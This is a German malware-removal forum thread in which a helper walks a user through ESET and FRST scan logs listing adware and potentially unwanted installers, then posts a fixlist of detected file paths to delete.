Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

Antwort
Alt 08.05.2017, 08:45   #31
Perlsau
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Kann man hier irgendwie einstellen, daß Antworten nicht automatisch an die letzte Antwort angehängt werden und somit kein neuer Post entsteht?

Eset hat sich nach der Beendigung selbst deinstalliert. Es gibt keinen Eset-Ordner mehr. Die Datei, die ich gepostet hatte (Eset.txt), ist die einzige, die ich noch habe. Muß ich jetzt Eset nochmal durchlaufen lassen?

Wenn ich XP herunterschmeiße, muß ich vermutlich auch Win7 neu aufsetzen, denn die Boot-Dateien befinden sich in WinXP. Außerdem hab ich noch ein paar andere Programme, die in Win7 nicht laufen, und auf die ich nicht verzichten kann.

Guten Morgen,

jetzt hab ich's hoffentlich richtig gemacht, sonst bin ich im Sommer noch beim Scannen

log.txt
Code:
ATTFilter
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=1517deb4d82f2945928042e51d8f5afa
# end=init
# utc_time=2017-05-07 02:44:03
# local_time=2017-05-07 04:44:03 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
Update Init
Update Download
Update Finalize
Updated modules version: 33301
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=1517deb4d82f2945928042e51d8f5afa
# end=updated
# utc_time=2017-05-07 02:47:25
# local_time=2017-05-07 04:47:25 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=1517deb4d82f2945928042e51d8f5afa
# engine=33301
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2017-05-08 05:14:58
# local_time=2017-05-08 07:14:58 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 119533188 245850348 0 0
# scanned=1894388
# found=17
# cleaned=0
# scan_time=52052
sh=2B10FC7EBAD4EB93D1A907CC6F5211BE6CF73D5E ft=1 fh=4782a1ec018bef3a vn="Variante von Win32/Packed.NoobyProtect.L verdächtige Datei" ac=I fn="C:\Windows\debug\item.dat"
sh=008B5622603AF870A143DDE4FF8B962369CA1811 ft=0 fh=0000000000000000 vn="Mehrere Bedrohungen" ac=I fn="E:\Temp\Search Extensions.7z"
sh=B60AEAB87A02CB330CCC49DD57604E6632BB8529 ft=0 fh=0000000000000000 vn="Mehrere Bedrohungen" ac=I fn="E:\Test\Test.7z"
sh=AF869EBB2AB73DF0EC0848268B146706064B69D1 ft=1 fh=a8eae96afa885ec8 vn="Variante von Win32/WinloadSDA.D eventuell unerwünschte Anwendung" ac=I fn="E:\_DownUnerledigt\Nährwerttabellen\Ernährungsmanager-lnstall.exe"
sh=552464E3A61B57248E7ABBB9E78047923105E150 ft=1 fh=8e19f37ab9b5e3fe vn="Win32/InstallMonetizer.AQ eventuell unerwünschte Anwendung" ac=I fn="E:\_DownUnerledigt\PDF\PDFCreator-2_3_0-Setup.exe"
sh=A8E1254B4D6F627FCE29178426538ED46A4E925F ft=1 fh=c3cb5f6f4c378d15 vn="Variante von Win32/DownloadSponsor.C eventuell unerwünschte Anwendung" ac=I fn="E:\_DownUnerledigt\RamDisk\SoftPerfect RAM Disk Letzte Freeware Version - CHIP-Installer.exe"
sh=DED201AE02FB9EA3646489AFEDA49270C4620D9C ft=1 fh=c71c001196f8c3ac vn="Variante von Win32/Toolbar.Babylon.C eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\BExternal.dll"
sh=7759A3318DE2ABC3755EBB7F50322C6D586B5286 ft=1 fh=e3d39714b3bfb2a0 vn="Win32/Toolbar.Babylon.E eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\IEHelper.dll"
sh=4B00E97A05225F2B3AC9007353F2EEDE5FD98FFA ft=1 fh=3ed7e14586a8dd2d vn="Win32/InstallMonetizer.BC eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-5HSES.tmp\InstallManager.exe"
sh=91FB0BF6A6AAE101E8094AEC7F5262B1B77F4619 ft=1 fh=44c6676d86a8dd2d vn="Win32/InstallMonetizer.BC eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-76TRA.tmp\InstallManager.exe"
sh=91FB0BF6A6AAE101E8094AEC7F5262B1B77F4619 ft=1 fh=44c6676d86a8dd2d vn="Win32/InstallMonetizer.BC eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-QFACO.tmp\InstallManager.exe"
sh=829D808C091045F45C513A6E4AB17055A52A9320 ft=1 fh=282fb76e1825b814 vn="Variante von Win32/Toolbar.Babylon.C eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is1108708961\DeltaTB.exe"
sh=C4BB99AE67ABBDCE908E602C92DB4328C3A8C40F ft=1 fh=ed8d43c277421165 vn="Variante von Win32/InstallMonetizer.BC eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsf19.tmp\nsManWeb.dll"
sh=BA5D225FE04ED9E21278011D1A6F6BBECB9134D8 ft=1 fh=57ab8a13e6ab5320 vn="Variante von Win32/Toolbar.SearchSuite.A eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsqC6\nsxC7.tmp\SetupDataMngr_Searchqu.exe"
sh=C4BB99AE67ABBDCE908E602C92DB4328C3A8C40F ft=1 fh=ed8d43c277421165 vn="Variante von Win32/InstallMonetizer.BC eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsr15.tmp\nsManWeb.dll"
sh=C4BB99AE67ABBDCE908E602C92DB4328C3A8C40F ft=1 fh=ed8d43c277421165 vn="Variante von Win32/InstallMonetizer.BC eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsx17.tmp\nsManWeb.dll"
sh=78291A99C56B070EA0908A09C9ED4823F72C6A31 ft=1 fh=303c525d22b897e4 vn="Variante von Win32/DownloadSponsor.A eventuell unerwünschte Anwendung" ac=I fn="W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\OCS\ocs_v7a.exe"
         
checkup.txt

Code:
ATTFilter
 Results of screen317's Security Check version 1.009  
 Windows 7 Service Pack 1 x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
Malwarebytes   
  (On Access scanning disabled!) 
 Error obtaining update status for antivirus!  
`````````Anti-malware/Other Utilities Check:````````` 
 Java 8 Update 131  
 Java version 32-bit out of Date! 
 Adobe Flash Player 25.0.0.148  
 Mozilla Thunderbird (45.8.0) 
````````Process Check: objlist.exe by Laurent````````  
 Malwarebytes Anti-Malware mbamtray.exe  
 T-Online DSL-Manager DslMgrSvc.exe  
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  
````````````````````End of Log``````````````````````
         

Geändert von Perlsau (07.05.2017 um 15:22 Uhr)

Alt 08.05.2017, 08:50   #32
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Zitat:
Außerdem hab ich noch ein paar andere Programme, die in Win7 nicht laufen,
Was soll denn das bitte für Uraltprogramme sein?
Programme, die im mittlerweile acht Jahre alten Windows 7 nicht laufen müssen ja wohl aus dem letzten Jahrhundert stammen.


Zitat:
E:\_DownUnerledigt\RamDisk\SoftPerfect RAM Disk Letzte Freeware Version - CHIP-Installer.exe

Keine Downloads mehr von CHIP.de!

Die verarschen ihre Kunden aus reiner Profitgier. Siehe auch http://www.trojaner-board.de/168364-...mpfehlung.html und CHIP-Installer - was ist das? - Anleitungen




FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!


Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
ATTFilter
C:\Windows\debug\item.dat
E:\Temp\Search Extensions.7z
E:\Test\Test.7z
E:\_DownUnerledigt\Nährwerttabellen\Ernährungsmanager-lnstall.exe
E:\_DownUnerledigt\PDF\PDFCreator-2_3_0-Setup.exe
E:\_DownUnerledigt\RamDisk\SoftPerfect RAM Disk Letzte Freeware Version - CHIP-Installer.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\BExternal.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\IEHelper.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-5HSES.tmp\InstallManager.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-76TRA.tmp\InstallManager.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-QFACO.tmp\InstallManager.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is1108708961\DeltaTB.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsf19.tmp\nsManWeb.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsqC6\nsxC7.tmp\SetupDataMngr_Searchqu.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsr15.tmp\nsManWeb.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsx17.tmp\nsManWeb.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\OCS\ocs_v7a.exe
emptytemp:
         

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.

__________________

__________________

Alt 08.05.2017, 09:29   #33
Perlsau
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Hat ein wenig länger gedauert, weil Farbar Recovery Tool abgestürzt ist:

Ging erst nach einem Neustart wieder. Malwarebytes war jetzt während des Scans vollständig deaktiviert, ich habe auch darauf geachtet, daß der Dienst beendet wurde. Jetzt hat FRST auch ein korrektes Update hinbekommen:

FRST.txt

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 07-05-2017
durchgeführt von Hamlet (Administrator) auf WIN7PC (08-05-2017 10:17:16)
Gestartet von C:\Users\Hamlet\Desktop
Geladene Profile: Hamlet (Verfügbare Profile: Hamlet & UpdatusUser & Entwickler & Administrator & SQL Server Distributed Replay Controller & MsDtsServer110 & MSSQLServerOLAPService & ReportServer & SQL Server Distributed Replay Client & MSSQLFDLauncher & SQLSERVERAGENT & MSSQLSERVER)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files (x86)\Internet\SeaMonkey\seamonkey.exe" -requestPending -osint -url "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
() C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe
(Firebird Project) C:\Program Files\DataBases\Firebird_2_5\bin\fbguard.exe
(Firebird Project) C:\Program Files\DataBases\Firebird_2_5\bin\fbserver.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(VIA) C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe
(hxxp://tortoisesvn.net) C:\Program Files\Internet\TortoiseSVN\bin\TSVNCache.exe
(Golden Frog, GmbH.) C:\Program Files (x86)\VyprVPN\VyprVPNService.exe
(Golden Frog, GmbH.) C:\Program Files (x86)\VyprVPN\VyprVPN.exe
(The OpenVPN Project) C:\Program Files (x86)\VyprVPN\OpenVPN\bin\openvpn.exe
(mozilla.org) C:\Program Files (x86)\Internet\SeaMonkey\seamonkey.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2171904 2009-06-05] (VIA)
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\MountPoints2: {531f30f5-1efd-11e5-97cc-002354355c9e} - F:\Startme.exe
ShellIconOverlayIdentifiers: [ 0Cloudfogger] -> {15EDBCBF-7231-4290-946E-5BB12C6AF342} => C:\Program Files\Utils\Cloudfogger\CfShellEx64_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ 1Cloudfogger] -> {14A3EC74-D852-416A-9691-AC3096EE1953} => C:\Program Files\Utils\Cloudfogger\CfShellEx64_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ 2Cloudfogger] -> {E9C2814C-12B8-4D74-9551-16DDEBFC8AE4} => C:\Program Files\Utils\Cloudfogger\CfShellEx64_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers: [1TortoiseNormal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [2TortoiseModified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [3TortoiseConflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [4TortoiseLocked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [5TortoiseReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [6TortoiseDeleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [7TortoiseAdded] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [8TortoiseIgnored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [9TortoiseUnversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [ 0Cloudfogger] -> {15EDBCBF-7231-4290-946E-5BB12C6AF342} => C:\Program Files\Utils\Cloudfogger\CfShellEx_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ 1Cloudfogger] -> {14A3EC74-D852-416A-9691-AC3096EE1953} => C:\Program Files\Utils\Cloudfogger\CfShellEx_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ 2Cloudfogger] -> {E9C2814C-12B8-4D74-9551-16DDEBFC8AE4} => C:\Program Files\Utils\Cloudfogger\CfShellEx_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [1TortoiseNormal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [2TortoiseModified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [3TortoiseConflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [4TortoiseLocked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [5TortoiseReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [6TortoiseDeleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [7TortoiseAdded] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [8TortoiseIgnored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [9TortoiseUnversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2016-02-28]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\Entwickler\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2015-05-23]
ShortcutTarget: DSL-Manager.lnk ->  (Keine Datei)
Startup: C:\Users\MsDtsServer110\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\MSSQLFDLauncher\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\MSSQLSERVER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\MSSQLServerOLAPService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\ReportServer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\SQL Server Distributed Replay Client\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\SQL Server Distributed Replay Controller\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\SQLSERVERAGENT\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{768BF69E-701E-424A-BB47-DBCF62B52D28}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{9AEFD35E-E3C1-41F1-AD9C-43D502202E74}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{D05D6B22-7C5B-402A-962B-AE33EB3E9B2E}: [DhcpNameServer] 10.3.29.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=de&pid=NIS&pvid=20.4.0.40
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=de&pid=NIS&pvid=20.4.0.40
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=de&pid=NIS&pvid=20.4.0.40
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\Software\Microsoft\Internet Explorer\Main,Start Page = file:///d:/html/_start/startseite.html
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
SearchScopes: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001 -> DefaultScope {AC406983-E03C-4ED6-BAA6-566F319910E8} URL = 
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll => Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-04-30] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-30] (Oracle Corporation)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll => Keine Datei
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll Keine Datei
DPF: HKLM {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://active.macromedia.com/flash2/cabs/swflash.cab

FireFox:
========
FF ProfilePath: C:\Users\Hamlet\AppData\Roaming\Mozilla\SeaMonkey\Profiles\ya7xd9pj.default [2017-05-08]
FF Homepage: Mozilla\SeaMonkey\Profiles\ya7xd9pj.default -> file:///D:/HTML/_Start/Startseite.html
FF Session Restore: Mozilla\SeaMonkey\Profiles\ya7xd9pj.default -> ist aktiviert.
FF NetworkProxy: Mozilla\SeaMonkey\Profiles\ya7xd9pj.default -> share_proxy_settings", true
FF Extension: (Deutsch (DE) Language Pack) - C:\Users\Hamlet\AppData\Roaming\Mozilla\SeaMonkey\Profiles\ya7xd9pj.default\Extensions\langpack-de@seamonkey.mozilla.org.xpi [2017-03-22] [ist nicht signiert]
FF Extension: (NoScript) - C:\Users\Hamlet\AppData\Roaming\Mozilla\SeaMonkey\Profiles\ya7xd9pj.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2017-04-23]
FF HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 => nicht gefunden
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-18] ()
FF Plugin: @videolan.org/vlc,version=2.0.7 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.0.8 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.1 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.2 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.4 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-18] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
